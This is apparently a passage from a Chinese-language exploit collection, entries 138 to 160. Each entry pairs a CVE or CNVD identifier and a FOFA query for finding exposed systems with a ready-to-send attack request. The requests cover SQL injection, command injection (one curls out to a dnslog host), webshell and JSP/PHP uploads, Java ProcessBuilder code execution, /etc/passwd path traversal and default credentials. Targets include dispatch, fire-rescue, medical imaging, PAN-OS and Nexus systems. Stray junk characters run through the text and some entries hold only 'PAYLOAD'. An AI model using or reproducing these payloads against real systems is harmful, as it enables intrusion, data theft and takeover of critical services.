1 n& x3 k; [0 y5 z) E. L& [Upgrade-Insecure-Requests: 1
" i' s& u$ e, M2 W% J* y+ v, y8 G3 p8 n+ w7 b) d- f( G

8 [' s# p4 W  C/ l# }138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
6 u6 G! d; V# R; |( ?* A' N) JCVE-2024-2621, j; j1 R1 o# [  ]3 D- ^
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"4 s8 T. p  c2 E% c# C; V
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
) U" ^! q# O+ T/ [; H3 V3 t3 wHost: x.x.x.x
/ Z- C1 C0 j( G1 d& SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
- K  w4 {: Z* @: l: I8 ]1 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 w7 Y9 M& C2 m: Y& `; KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. s6 G9 ?- C2 z  Z$ O5 v7 a' K( _
Accept-Encoding: gzip, deflate, br
8 Q6 k  X1 C& x& o# i2 Z! \* zConnection: close0 V* q3 T/ p, g% W: }+ Y  {4 W
Upgrade-Insecure-Requests: 1
: ?" G9 e0 U- _- B3 G8 n. o3 e( V! v, o( H3 l+ D- W
4 s* L+ S0 ]4 I7 [
139. 福建科立讯通信指挥调度平台editemedia.php sql注入/ X. l& k/ N2 O( l3 k: P
CVE-2024-2622
6 }8 V. g: `# @9 }& I8 |FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
/ H8 l! B. P2 \' x  SGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1) Z5 h. D' j/ h! v2 a4 X) Q! b
Host: x.x.x.x4 |8 F  a6 g0 M5 L- a/ y% c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! P1 X9 y2 g: A7 g4 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! M) D; P8 y8 B9 P: n( a2 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ E: m1 `7 |% {. {  C5 P/ Q
Accept-Encoding: gzip, deflate, br
0 V# W3 K0 S' P9 }. s% r1 fConnection: close6 O' s9 z# {+ \" V7 H' u
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
# J$ L6 k0 N0 }5 o7 `6 ]Upgrade-Insecure-Requests: 1, Q% P( V- _4 u+ C* Z" Q
' m  H; P: m5 U2 E, ~

2 r) c: `' m7 k" o: O6 s140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入4 `4 m1 u' \6 S6 s
CVE-2024-2566, |2 I$ N. X1 \8 I3 r/ t2 h
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 i' e7 A3 ?0 F4 K6 L$ s3 I1 K3 x* j
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
, @; N5 k) K+ p1 [; F) @8 |/ U1 _" ^Host: x.x.x.x" C  K$ C- _) h9 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0# ~1 r8 L+ v) ?3 p4 s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) h+ G0 \4 d! l& N$ `0 t! S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, x; V. Z# G3 n/ z
Accept-Encoding: gzip, deflate, br( k/ Q$ p' K$ ^* G
Connection: close9 N8 z( A. \3 f/ V
Cookie: authcode=h8g9/ P9 k, D' G; [  \* d. u; ~) D# d
Upgrade-Insecure-Requests: 1" l7 `9 b9 j7 n. b% F" ?
) z, W# O1 i7 f+ C% d! n

5 w# m$ r/ V, }1 L: |# f141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入: [& ?: l& o, H/ V
FOFA:body="指挥调度管理平台"5 {5 {: w0 l- W. v4 L4 D
POST /app/ext/ajax_users.php HTTP/1.1
; w5 c- C/ G3 |7 }. G& QHost: your-ip0 ]8 T3 E: y5 X9 r* Y1 Z
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info, X" M4 [, F  ^8 @
Content-Type: application/x-www-form-urlencoded& W6 q" f" u# Q8 F1 W6 N- J
- U2 C% o# r0 J* D$ V

* `7 p( |& k6 i4 h8 M# Edep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -, l. |: {/ z: J' K/ W
) c4 b+ p; s! q+ C
& f& {, s+ l$ e" g6 S
142. CMSV6车辆监控平台系统中存在弱密码
4 y5 l* q9 Y9 a4 I  L; rCVE-2024-296660 u# k/ m2 r2 j0 [
FOFA:body="/808gps/"
5 y; H3 ^) m; l; o7 ]' U+ ~  W9 `admin/admin
% Z0 Y/ `- Y$ s3 |143. Netis WF2780 v2.1.40144 远程命令执行# U- `/ [/ U) [. Z' t
CVE-2024-25850
( [" s0 ~6 s+ m* I/ G( WFOFA:title='AP setup' && header='netis'3 j+ U9 d7 C( S6 @. Z
PAYLOAD
$ f* m4 R3 u8 ^7 o: a0 C6 u5 v( U. M, l! k6 b7 x. p
144. D-Link nas_sharing.cgi 命令注入
: B: }1 H; ?# u' r$ {& MFOFA:app="D_Link-DNS-ShareCenter"
+ c# w0 i" d4 Z+ c8 K* g3 |+ e# xsystem参数用于传要执行的命令- M7 @& R0 Y/ d& _
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.12 V( F5 Z4 G+ P5 g
Host: x.x.x.x" a. f+ N' m! C# i- d5 y
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0: v! S5 J8 {' A5 r. w0 m
Connection: close4 u, s8 E! m! P, Q
Accept: */*5 i0 }1 M) W. |3 ?) C) Z9 k/ `
Accept-Language: en
: Y" m& \7 z6 j# C% M5 g& V: gAccept-Encoding: gzip
: M! B3 a- H/ k/ ]
8 s( ^) `+ h, g8 V, E6 R' m+ U! n, F- N% y  u) W
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
0 O9 w9 h$ C% I8 [( f, g0 uCVE-2024-3400
% g. L; Y2 O0 U2 zFOFA:icon_hash="-631559155"
0 R* l/ m0 q( i  HGET /global-protect/login.esp HTTP/1.1
* L2 E4 ]  g) O2 J5 yHost: 192.168.30.112:10058 P. N& ?# k: a9 e* w, P. r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.840 O& Z7 s6 l9 Z" x  x! j
Connection: close( o" V4 l# o( [/ d
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;6 ^% \2 ]4 @( ^- R5 @5 u! M6 ^, ?
Accept-Encoding: gzip9 k' R6 i  p" J* s  d/ G

0 `  ?7 d4 [% |) f/ l
, |/ s* y8 @+ @. Q7 ?* H! c* H146. MajorDoMo thumb.php 未授权远程代码执行
1 r  R0 X0 H7 H: dCNVD-2024-02175
' M" R; G: A4 n3 A0 \FOFA:app="MajordomoSL"
! X$ p4 s0 b9 ]GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.17 i( J$ ~/ r. t% s% k' n1 U# x0 P5 `
Host: x.x.x.x
0 k3 L+ q1 ?  n% R1 i% RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.841 V: z; l3 g& k- P$ f) B; x# m9 N
Accept-Charset: utf-87 s) M+ p; Y- ]! t& e3 E/ N+ N: d3 T' G, w
Accept-Encoding: gzip, deflate, g7 k' N' D, _+ e8 ?$ H: j
Connection: close6 X1 e% G% p/ r+ y

8 h/ W) j$ _- k' E; W6 Y
1 P+ D6 F2 C1 b147. RaidenMAILD邮件服务器v.4.9.4-路径遍历+ Z, @" _. w1 @6 v
CVE-2024-32399
. A0 h0 ]8 H3 S  `FOFA:body="RaidenMAILD"( u" r' H$ F' v2 {  p$ ]
GET /webeditor/../../../windows/win.ini HTTP/1.1+ ^0 i; X( L2 k9 x5 Z1 n0 S
Host: 127.0.0.1:81
& I$ h5 s* g- sCache-Control: max-age=0
- Q6 K* g9 B# I+ dConnection: close  E- H% R* `- x/ y( p+ S

$ w7 \7 Z1 b8 w2 h  X" Q/ t& z; U: ?; z6 ^1 ?: i3 T
148. CrushFTP 认证绕过模板注入
* f( u+ M1 F/ i* H  U0 D$ K6 ~/ WCVE-2024-4040
" p' @( ~( `, Y0 DFOFA:body="CrushFTP"
9 c4 G& v( R' BPAYLOAD5 V7 b" I7 z- u2 l
0 ^9 r) D8 F3 V, f! T! f* q0 {* L6 {' g6 J
149. AJ-Report开源数据大屏存在远程命令执行, e. y1 n& v7 x9 O. v
FOFA:title="AJ-Report"9 @: |0 Z! k0 M, s
. f& [1 V' y2 F$ T
POST /dataSetParam/verification;swagger-ui/ HTTP/1.14 Q: s1 ?% i5 m- M8 A) T1 b, W/ Z7 [
Host: x.x.x.x( q- I  f0 s# ?8 A- K6 o3 A5 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36/ O- r% p8 p# E; E" _; ^2 e( r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 c: z; {! I3 B6 o& J* w
Accept-Encoding: gzip, deflate, br) E  R2 W) t! _5 F/ b
Accept-Language: zh-CN,zh;q=0.9! S) K, ^7 m. u4 V
Content-Type: application/json;charset=UTF-8
9 J! n. h. b1 n& t4 b" hConnection: close
7 Q$ y& ?& H" E- X" s! c  C6 m2 q' V, y$ K0 U7 s) s4 H- z
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}5 A2 E  s. o$ A% W

' q9 O- a9 b. c3 ^150. AJ-Report 1.4.0 认证绕过与远程代码执行- |( D/ }. f: y1 d& \
FOFA:title="AJ-Report"% _4 l) _4 J( |- z) N! u: z$ o
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
/ X% Y3 \& p' i4 S& FHost: x.x.x.x$ [2 S, @9 G7 f9 X2 G6 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" d. ?7 s9 |  ~4 c! R! BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ Y- Q) b1 @; H* d; G
Accept-Encoding: gzip, deflate, br/ I$ H& Y1 m: V. F# C4 b
Accept-Language: zh-CN,zh;q=0.94 R) n, a* q% k8 z$ Q" p% t5 J
Content-Type: application/json;charset=UTF-8
$ n+ W, C; O# I" uConnection: close6 q; C1 G! ]* J+ s
Content-Length: 3395 D) l' w# ?. m! Z9 S! g3 u

, ^7 R4 f+ C8 i+ Y/ z{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
. X8 p5 Y" c% S! q( y  s8 Q) ^0 L, f2 d" `  I5 p$ N

( X- J  S1 F$ ?5 H" @, _2 T3 b151. AJ-Report 1.4.1 pageList sql注入
) j$ j. E2 m2 a# z  ^0 F4 yFOFA:title="AJ-Report"
/ Q1 [" T. H! e  t0 ~6 eGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1) @8 C6 B" ]  b% ?- L! k2 b
Host: x.x.x.x
' F2 T  I& T- A% i0 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ H6 u  X$ \+ @! U  H4 ~
Connection: close/ P# f- e! t8 B  w- f- E
Accept-Encoding: gzip" K4 v9 P" _6 W! f2 P7 `

7 n/ ?1 o+ X* f5 `( m8 Q* J! H/ X) L! D5 x3 Q* R
152. Progress Kemp LoadMaster 远程命令执行
5 \: r# h. q  j2 {# p5 j" lCVE-2024-1212% i$ D! `! E9 M2 U; r
LoadMaster <= 7.2.59.2 (GA)
6 L* D0 ]/ C3 T& j2 _LoadMaster<=7.2.54.8 (LTSF)
" h  p0 A) k# S- Y' i% XLoadMaster <= 7.2.48.10 (LTS)- p1 R) [3 [5 s2 O4 T- k! [
FOFA:body="LoadMaster"; R) ]2 M$ x& l0 E
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
9 x. n0 }4 U8 NGET /access/set?param=enableapi&value=1 HTTP/1.1
/ w$ j9 O  W* |4 V9 l  g2 PHost: x.x.x.x
+ A9 j1 Z4 l7 k/ jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1% j. O9 f: g  K* y$ K# K) H% x0 J) N4 R
Connection: close3 T3 r0 x8 H# ?' U+ U4 h& R, A
Accept: */*
$ |# t) h% {: l* V% W, Q$ _Accept-Language: en4 s. b# U! [9 z1 m/ d9 R- }
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=- @3 i7 m6 a0 y; X  P9 R! P2 C4 z
Accept-Encoding: gzip
, }, S0 d" ~0 `3 g2 Y* h" g  Q4 h* @" e! P' Z: d- J7 G# n2 _9 r

6 W# Z$ B2 l! P! D7 T153. gradio任意文件读取  B, q8 R( Z; \
CVE-2024-1561FOFA:body="__gradio_mode__"
' _, ?  _0 Q' m, @8 }第一步,请求/config文件获取componets的id
9 C. M& g2 r( g$ I0 _7 S" V. M; phttp://x.x.x.x/config1 g! u1 U! R+ K

; W* C+ D' \, p! O  A/ f8 i& A: a- q4 Y! a
第二步,将/etc/passwd的内容写入到一个临时文件
& t# ^! M2 c8 IPOST /component_server HTTP/1.10 N8 P- t3 I# L. M
Host: x.x.x.x. g7 i# \5 T8 ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3, m) i8 s' n) d
Connection: close7 |& N) Q0 G, J
Content-Length: 115
( O( T  m; o* l' u. \8 aContent-Type: application/json
% F/ z& D2 S2 `Accept-Encoding: gzip1 H) a" k; `( k9 c

& }. Q7 K- G) @% u2 l& a  ]{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}+ e& Q: t! {3 T: K6 V
& Z( d. T+ `& `1 Q/ l: O

( e4 {! G, M$ ~8 d第三步访问
+ o- F  H$ j( J7 Vhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
( Z2 V* R8 S2 m
) I% F6 r; q2 v( g/ X9 ^1 ^" E  T! V/ g. v$ R* ~
154. 天维尔消防救援作战调度平台 SQL注入
' D& P1 Q% j& j) U8 y, k, |CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"! H8 Y1 h9 T- ~- q
POST /twms-service-mfs/mfsNotice/page HTTP/1.15 P5 a& c) a, V% _
Host: x.x.x.x
: U3 U5 C% _' m7 v0 O# wContent-Length: 106
7 u4 d3 O; p6 l- z+ gCache-Control: max-age=0; K) V0 `: I8 y$ v; e, z& S5 @
Upgrade-Insecure-Requests: 1
* G0 I# M' p$ nOrigin: http://x.x.x.x1 ?) }) M5 E. e. C
Content-Type: application/json
& t6 n9 c# q) Z: n% [4 J$ ]3 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
2 q1 ^1 v& _* ~& qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ D: X9 R5 T( H# R+ l5 [, l" k
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page+ r/ t( K, e1 N" \4 k  h' P9 G
Accept-Encoding: gzip, deflate
. o5 G  r2 v# O' {Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7( c9 |) }, Y3 g
Connection: close
, g+ U2 ^, O+ y; {0 x% G- b* i+ }. x. i2 C' X$ I) ?
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
0 z9 b3 }& H: f8 @; ^
: `; F& T! i  y) T) x
+ A0 x* S  p3 R/ S  c. U" B155. 六零导航页 file.php 任意文件上传# G. D7 ]9 X+ h& M8 m5 s
CVE-2024-349821 [1 ^. N8 I) x9 p# W, o
FOFA:title=="上网导航 - LyLme Spage"! t! }( ?& V8 T& N, g; J
POST /include/file.php HTTP/1.1
2 V" `2 y0 ~. Z1 l! ]Host: x.x.x.x
; m$ C7 \" \) [: p9 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
5 q, {: i" l1 L( ~+ yConnection: close
5 o* X" Z/ L0 Y/ f3 UContent-Length: 232
- ^& `* ~& p# b1 r0 k# mAccept: application/json, text/javascript, */*; q=0.019 D$ S) v. S( O0 m5 M3 `
Accept-Encoding: gzip, deflate, br
3 j9 f3 V( Z5 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  k: Q. m, f  T9 r- J5 d2 LContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
1 L: D3 a" B- b3 TX-Requested-With: XMLHttpRequest8 Y) P* T" L2 ^+ p! y

& \0 d, j3 C! m" `/ h5 z-----------------------------qttl7vemrsold314zg0f
( T; e# k+ s, l- XContent-Disposition: form-data; name="file"; filename="test.php"4 j/ Y/ R3 r& q; R/ G2 j  A
Content-Type: image/png+ i# \7 a- u2 }) [, B

( D: Q# M! `( O( [6 c, ~<?php phpinfo();unlink(__FILE__);?>
1 }: P" Q+ ?6 p; |6 d-----------------------------qttl7vemrsold314zg0f--) w/ X! J% V  g- g0 g
, w6 n: o5 b# j5 B  Z4 R

7 b1 w0 z9 |6 a9 M3 O访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
  [7 T5 F( q8 l! l' N. C
! {! S) J& Z6 ?6 Z4 k156. TBK DVR-4104/DVR-4216 操作系统命令注入
1 f! P5 K7 u5 D& GCVE-2024-3721" R3 N" Z* o( G
FOFA:"Location: /login.rsp"
4 {6 l4 K; K, p8 h- i+ p·TBK DVR-4104
9 \! c+ V- F0 K$ q7 `9 e·TBK DVR-4216
5 Q8 k1 B! U  X* ], V3 j# \5 _5 mcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1") K9 \: a# B5 h  O- p. R
8 A9 E' F1 C0 m9 F
/ @  Y% ^5 N* d4 f; m7 M$ b
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1; _& G. j" j, E5 V7 U% z" l
Host: x.x.x.x
7 o! X6 j  d# \User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% i: Z! O+ G+ W0 ?; b5 k6 X3 s
Connection: close% o$ [; _8 H) e
Content-Length: 0, g3 w: ]( \( b, s
Cookie: uid=1
, m6 s; F9 y+ L4 `4 DAccept-Encoding: gzip
2 q+ }/ k2 }' u- q$ n" }- l/ Y( r; f/ q3 |

3 |! y& J$ N9 T4 {( B: O' v5 ]) Z4 K157. 美特CRM upload.jsp 任意文件上传
! |7 D  A4 b0 K5 {4 D5 RCNVD-2023-06971
* r1 A6 X8 c: j7 m" zFOFA:body="/common/scripts/basic.js"
7 l8 W  c/ B( |3 n& b" G  cPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1; X9 s; f$ \3 p- {
Host: x.x.x.x/ g' P- S  \8 P0 D8 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
. ]/ ?/ C& _2 q* @Content-Length: 709
) S- x. o9 t9 M" L8 X; OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" K- @1 l' ]/ B6 P( i
Accept-Encoding: gzip, deflate' y$ e2 \9 W; ^9 u9 M/ t+ B# @
Accept-Language: zh-CN,zh;q=0.9& e' f: c, `* d) x. [* m
Cache-Control: max-age=0
; c9 Y; R1 _4 [Connection: close
( t. D- g4 B. p) E9 U0 U- L# l# `Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN% S6 S+ M! R8 L5 b7 [% P
Upgrade-Insecure-Requests: 15 K$ L0 e0 ^6 N' f4 d4 f9 S

3 g4 {% t8 J9 Z+ L' e: h------WebKitFormBoundary1imovELzPsfzp5dN
; M/ f, ^; B1 ^1 D; Z8 FContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp", i, G) ~, ]  D1 y2 }) H% p
Content-Type: application/octet-stream/ I" o8 @! F* A- B9 N# i1 Y
2 E8 E1 V) E+ c
nyhelxrutzwhrsvsrafb
- b# a7 v9 W+ `& e------WebKitFormBoundary1imovELzPsfzp5dN
4 z) e# s- N3 s! U/ yContent-Disposition: form-data; name="key"
6 Q9 V4 |8 }+ `3 o! j* X! U# k( `  n
8 a# E8 K5 G$ ~1 s* e) Q  d( rnull
- q" A2 X( a. [8 q! t------WebKitFormBoundary1imovELzPsfzp5dN. c) f) d6 m. Z6 x. X
Content-Disposition: form-data; name="form"
$ e2 y$ l' _1 }' j, ~, U
1 h* f' i1 G6 \null
/ @  w" a: b; f" Z------WebKitFormBoundary1imovELzPsfzp5dN6 C- M. y" x+ N7 i
Content-Disposition: form-data; name="field"7 |% F, L- L- B* c" o' W+ h% G  t
4 G+ i$ U" s& v0 X, P1 D
null: ^0 {* g' `% h& u
------WebKitFormBoundary1imovELzPsfzp5dN+ b0 Y( W+ Q& g9 ~
Content-Disposition: form-data; name="filetitile", P" i, S7 k" @- H4 G

) _+ X/ }7 _; W; k2 Q# m0 D! U! Tnull
. J3 X! j7 v  L: ?# m: z------WebKitFormBoundary1imovELzPsfzp5dN
7 E9 R. V1 L5 H2 U6 M& l% `Content-Disposition: form-data; name="filefolder"3 c2 o" i6 O3 y' C2 P/ B
6 o) o# C  L( Z  ?5 L4 l
null
4 @& j2 z3 M# X/ {; z5 h: z------WebKitFormBoundary1imovELzPsfzp5dN--
' m: l8 J8 T+ v6 [1 h$ }  t9 x- Z; h9 [# s1 n, O( w
- m' D7 ^* i1 l7 u
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp$ ?1 W, {5 A$ k, w7 ]& Z

* |" o2 o& N& C) J158. Mura-CMS-processAsyncObject存在SQL注入
' l# N; W5 a7 q) L4 l% h! H4 i; NCVE-2024-32640) ~5 w7 l, e* _# f  v# D
FOFA:"Generator: Masa CMS"
- N3 t" n1 |$ y; ~+ p: P- bPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
2 w+ k  O+ z! c8 q. EHost: {{Hostname}}8 x5 j. V1 P/ e
Content-Type: application/x-www-form-urlencoded# ~+ i3 w# P; z# b, X- n
: S' p" I: H+ }/ f% a" F# F5 w
object=displayregion&contenthistid=x\'&previewid=1/ s! [7 G5 @% h) C

! e7 L  x" P% n& b+ U! w. t: w2 J2 W) A
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
4 ]8 z6 ?( G/ N, Y9 fFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")6 h8 ]  |. v* w1 `
POST /webservices/WebJobUpload.asmx HTTP/1.1
% B8 m2 l" ^$ \8 zHost: x.x.x.x) B; W; g" ]( X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
" F( d& i4 z. d* J& g- y) t; q5 yContent-Length: 1080
' I% y3 g$ c1 k" q; @* G2 zAccept-Encoding: gzip, deflate; ?0 i" t7 n9 l7 {
Connection: close' ]( f  ~, G+ ?  _' H
Content-Type: text/xml; charset=utf-8: u: k/ N8 w5 u
Soapaction: "http://rainier/jobUpload"6 U. u0 i$ O1 i+ v5 l! ?1 \
  D' e5 P5 h- ?( ^# M/ Q- w. E
<?xml version="1.0" encoding="utf-8"?>7 ]: Q$ L% G( K- D
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">0 A$ ]$ C8 U, F' ~. d
<soap:Body>9 r$ G( c! d+ q+ j# s7 C$ ]* g+ X
<jobUpload xmlns="http://rainier">- s6 @: S' `/ H& J/ K5 g  U
<vcode>1</vcode>
+ l/ ]  T# w8 K<subFolder></subFolder>
9 ]% y. B3 v# ?0 B- k, j8 [9 C( |<fileName>abcrce.asmx</fileName>% Z- n% f. ^, m& k  Y+ p; t7 d% t
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
7 B7 N: A- Z  H/ K1 i8 U</jobUpload>
) M& C, |; M, Y. @, i( Y</soap:Body>
4 _3 c& p' D/ V</soap:Envelope>5 ]+ L" f7 ^9 U) }; `

8 m% i+ z3 [. T4 i5 U% f
; x. l* g) W. [3 b/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
* l0 T' U) O, M2 u4 e' y5 d! \! `- a5 {

! ]/ k: z' y: m" \& r160. Sonatype Nexus Repository 3目录遍历与文件读取- ^6 z5 H+ c% j# e2 v; F
CVE-2024-4956- x) j+ I3 C7 A3 {7 p' D$ d
FOFA:title="Nexus Repository Manager"
& r) J$ C! n0 o: S) aGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1( ^* x. W* h: N2 u. _$ C+ p3 Q
Host: x.x.x.x6 X/ i. v' l4 @4 q( C- M+ j
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.00 j9 g. t2 Q4 X) ^/ k+ y5 j
Connection: close
